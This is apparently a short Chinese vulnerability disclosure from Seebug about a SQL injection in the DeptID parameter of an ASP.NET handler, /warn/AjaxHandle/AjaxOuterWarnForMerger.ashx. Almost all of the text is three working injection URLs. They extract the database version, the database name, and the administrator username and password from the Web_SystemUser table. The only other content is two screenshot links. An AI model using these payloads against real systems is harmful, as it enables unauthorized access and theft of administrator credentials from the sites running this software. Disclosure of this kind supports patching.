```
注入链接:/warn/AjaxHandle/AjaxOuterWarnForMerger.ashx
注入参数:DeptID
【获取数据库版本】
/warn/AjaxHandle/AjaxOuterWarnForMerger.ashx?action=GetCheckIdByPid&DeptID=1'+AND+2709=(SELECT+@@version)+AND+'EcwM'='EcwM
【获取当前数据库】
/warn/AjaxHandle/AjaxOuterWarnForMerger.ashx?action=GetCheckIdByPid&DeptID=1'+AND+2709=(SELECT+db_name())+AND+'EcwM'='EcwM
【管理员账号密码】
/warn/AjaxHandle/AjaxOuterWarnForMerger.ashx?action=GetCheckIdByPid&DeptID=1'+AND+2709=((select+top+1+UserID%2b'|'%2bUserPwd+from+strongmain.dbo.Web_SystemUser))+AND+'EcwM'='EcwM
```
![](https://images.seebug.org/contribute/d72f4045-bc59-4153-bece-15144f566a52-屏幕快照 2016-01-15 下午11.12.50.png)
![](https://images.seebug.org/contribute/7ce3093b-88c5-4e0b-8fda-469f49283078-屏幕快照 2016-01-15 下午11.13.43.png)
暂无评论